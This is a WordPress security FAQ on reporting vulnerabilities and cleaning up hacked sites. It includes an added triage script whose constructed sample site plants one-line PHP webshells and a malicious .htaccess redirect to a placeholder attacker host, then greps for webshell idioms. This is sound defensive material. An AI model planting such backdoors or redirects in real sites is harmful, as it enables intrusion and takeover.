
FAQ Security

Back to FAQ

What is a "security" issue?

A security issue (or security vulnerability) is a type of bug that affects the security of WordPress installations.

If you've found a bug in the WordPress core code that you have determined can be used to gain some level of access to a site running WordPress that you should not have, then that is a security issue.

Before you report a security issue, please bear in mind the following:

  1. Your blog being "hacked" is not a security issue. A security issue will involve knowing how the attacker got in and hacked your site. If you have details on the attack vector, then email us at security at wordpress.org. If not, report the issue on the Support Forums.
  2. Forgetting your password or losing access to your site is not a security issue. You should try resetting your password or contacting your site administrator or host for help.
  3. Generally, security issues are complex problems. If you want to report a security issue, then that's great! You're in the right place. However, be sure that what you're reporting is actually a security issue so you don't waste your own time or that of the experts you report it to.
  4. The security mailing addresses are NOT for support. Don't send general problems to them. Your message will not be replied to. Use the Support Forums instead.

Where do I report security issues?

Before reporting a security issue, please make sure you've read the section above and determined that the issue is actually one of security.

  • For a WordPress.com security issue, please see the Automattic Security page.
  • For a WordPress plugin security issue, email plugins [at] wordpress.org with as much detail as you can. You should also contact the plugin developer either via email (if it's listed in the plugin source code), or by posting in the support forum on their plugin page asking how best to send them details.
  • For a security issue with the self-hosted version of WordPress, email security [at] wordpress.org with as much detail as you can.

In all cases, you should never publish details of a security vulnerability before a fix has been released. Doing so puts every affected site at risk and is irresponsible and unprofessional.

Where do I report copyright infringements, libel, and other legal issues?

WordPress.org does not host sites. WordPress.org provides publishing software that anyone can download and use. The organization, WordPress.org, has no control over who uses the software or how they use it. In other words, WordPress.org does NOT have the power to take down comments, posts, sites, or anything else.

Instead of trying to contact WordPress, perform a whois lookup to track down the operator or host of a particular site, then report the infringement to those organizations.

If you still can't determine the organization, the following articles by Plagiarism Today may help:

I've been hacked. What do I do now?

If you have been hacked, see the FAQ My Site Was Hacked for a more comprehensive list of steps.

Two good plugins to assist in your manual search of infections include:

They are not the be-all and end-all, but they can get you going in the right direction. Here is a short list of actions you should also take:

  • Change the passwords of all users, especially Administrators and Editors. (The Sucuri Plugin can assist you with post-hack actions.)
  • If you upload files to your site via FTP, change your FTP password.
  • Clear saved FTP sessions and logs on your local machine, especially if you use FileZilla on Windows: FileZilla has historically kept site passwords in plain-text configuration files, which credential-stealing malware on a workstation targets.
  • Re-install the latest version of WordPress from a fresh download rather than overwriting in place: remove the core files and directories (wp-admin, wp-includes) and add clean copies, because overwriting leaves behind any files the attacker added. Keep wp-config.php and wp-content, but inspect them.
  • Make sure all of your plugins and themes are up to date.
  • Check the permissions of files and directories in the install (typically 644 for files and 755 for directories; nothing should be world-writable).
  • Check the .htaccess file (Apache) for rules you did not add, such as redirects or directives that load additional PHP.
  • Look for backdoors with your FTP client or a shell: PHP files under wp-content/uploads, files modified more recently than your last legitimate change, and code calling eval() or base64_decode() on request input.
  • Regenerate the security keys and salts (AUTH_KEY, SECURE_AUTH_KEY and the rest) in wp-config.php; this invalidates every existing login cookie, so an attacker holding a stolen session is logged out.
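The cleanup list above, carried out as a runnable triage script. This is an added example, not code from the WordPress Codex or the WordPress project: it builds a constructed sample WordPress tree under a temporary directory (the theme name sampletheme, the planted files and the attacker.example host are all made up) and runs the permission, .htaccess, backdoor and security-key checks against it.

```shell
#!/bin/sh
# Added example (not from the WordPress Codex): post-hack triage of a WordPress
# tree. Everything under the sample directory is constructed for the demo.

# Build a small fake WordPress tree with one PHP backdoor in uploads, one
# backdoor hidden in a theme file, one world-writable core file and two injected
# .htaccess lines. Prints the directory path.
make_sample_site() {
    dir=$(mktemp -d)
    mkdir -p "$dir/wp-content/uploads/2024/01" \
             "$dir/wp-content/themes/sampletheme" \
             "$dir/wp-includes"
    # Legitimate-looking files
    printf '<?php\n// Silence is golden.\n' > "$dir/wp-content/index.php"
    printf '<?php\n$wp_version = "0.0";\n' > "$dir/wp-includes/version.php"
    printf '<?php\n/* Theme functions */\n' > "$dir/wp-content/themes/sampletheme/functions.php"
    # Planted: executable PHP where only media belongs, running attacker input
    printf '<?php eval(base64_decode($_POST["c"]));\n' > "$dir/wp-content/uploads/2024/01/image.php"
    # Planted: one-line backdoor appended to a theme file
    printf '<?php\n/* Theme header */\n@eval($_REQUEST["x"]);\n' > "$dir/wp-content/themes/sampletheme/header.php"
    # Planted: redirect and PHP prepend added outside the WordPress-managed block
    printf '# BEGIN WordPress\nRewriteEngine On\n# END WordPress\nRewriteRule ^(.*)$ http://attacker.example/$1 [R=301,L]\nphp_value auto_prepend_file /tmp/prepend.php\n' > "$dir/.htaccess"
    # Normalise permissions (644 files, 755 dirs), then plant one world-writable file
    find "$dir" -type d -exec chmod 755 {} +
    find "$dir" -type f -exec chmod 644 {} +
    chmod 666 "$dir/wp-includes/version.php"
    printf '%s\n' "$dir"
}

# 1. PHP anywhere under wp-content/uploads: WordPress only stores media there,
#    so any .php file is suspect.
find_php_in_uploads() {
    find "$1/wp-content/uploads" -type f -name '*.php' | sort
}

# 2. PHP files using the idioms webshells rely on. Core and some plugins use a
#    few of these legitimately, so diff the hits against a clean copy of the
#    same WordPress version before deleting anything.
find_suspicious_php() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        '(eval|base64_decode|gzinflate|str_rot13|shell_exec|passthru)[[:space:]]*\(' {} + | sort
}

# 3. World-writable files or directories (mode o+w). Nothing in a WordPress
#    install should be writable by every local account.
find_world_writable() {
    find "$1" -perm -002 ! -type l | sort
}

# 4. Directives in .htaccess outside the "# BEGIN/END WordPress" block: these
#    are not WordPress's own, so a human has to vouch for each one.
find_htaccess_additions() {
    awk '/^# BEGIN WordPress/ { inwp = 1; next }
         /^# END WordPress/   { inwp = 0; next }
         !inwp && NF && $0 !~ /^#/ { print FILENAME ":" NR ": " $0 }' "$1/.htaccess"
}

# 5. Fresh keys and salts for wp-config.php (96 hex chars = 384 bits each,
#    drawn from /dev/urandom). Replacing them invalidates every login cookie.
generate_salts() {
    for key in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY \
               AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT; do
        printf "define( '%s', '%s' );\n" "$key" "$(od -An -N48 -tx1 /dev/urandom | tr -d ' \n')"
    done
}

# Run the checks against the constructed sample tree
demo_site=$(make_sample_site)
echo "== PHP files in uploads ==";        find_php_in_uploads "$demo_site"
echo "== suspicious PHP ==";              find_suspicious_php "$demo_site"
echo "== world-writable ==";              find_world_writable "$demo_site"
echo "== .htaccess additions ==";         find_htaccess_additions "$demo_site"
echo "== new salts for wp-config.php =="; generate_salts
rm -rf "$demo_site"
```

On a real site, point the functions at the install root instead of the sample directory. The grep in step 2 is a heuristic: WordPress core and legitimate plugins call base64_decode() too, so treat a hit as a file to compare against a pristine download of the same version, not as proof of compromise. The salts are generated locally as an offline stand-in for the WordPress.org secret-key service; paste the eight define() lines over the existing ones in wp-config.php.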

Why are some users allowed to post unfiltered HTML?

Users with Administrator or Editor roles are allowed to publish unfiltered HTML in post titles, post content, and comments. WordPress is, after all, a publishing tool, and people need to be able to include whatever markup they need to communicate. Users with lesser privileges are not allowed to post unfiltered content.

If you are running security tests against WordPress, use a lesser privileged user so that all content is filtered. If you are concerned about an Administrator putting XSS into content and stealing cookies, note that all cookies are marked for HTTP only delivery and are divided into privileged cookies used for admin pages and unprivileged cookies used for public facing pages. Content is never displayed unfiltered in the admin. Regardless, an Administrator has wide-ranging super powers among which unfiltered HTML is a lesser one.

In WordPress multisite, only Super Admins can publish unfiltered HTML, as all other users, including individual site administrators, are considered untrusted.

To disable unfiltered HTML for all users, including administrators, you can add define( 'DISALLOW_UNFILTERED_HTML', true ); to wp-config.php.

Why are there path disclosures when directly loading certain files?

Loading certain files directly, outside the normal WordPress bootstrap, can trigger a PHP error message that includes the file's absolute path. This is considered a server configuration problem, not a WordPress vulnerability: never enable display_errors on a production site. Set display_errors = Off and log_errors = On in php.ini so errors go to the server log instead of the browser.

Why did I get this "Password Reset" email?

If you get an email saying "Someone has asked to reset the password for the following site and username", someone visited the password reset page on your site and entered your username or email address. Anyone can visit this page, since it must be open to everyone for it to be usable by people who have genuinely lost their password. The password is changed only by following the link in that email, so only someone who can read your mailbox can complete the reset. If your email account has not been compromised, you can ignore the message.
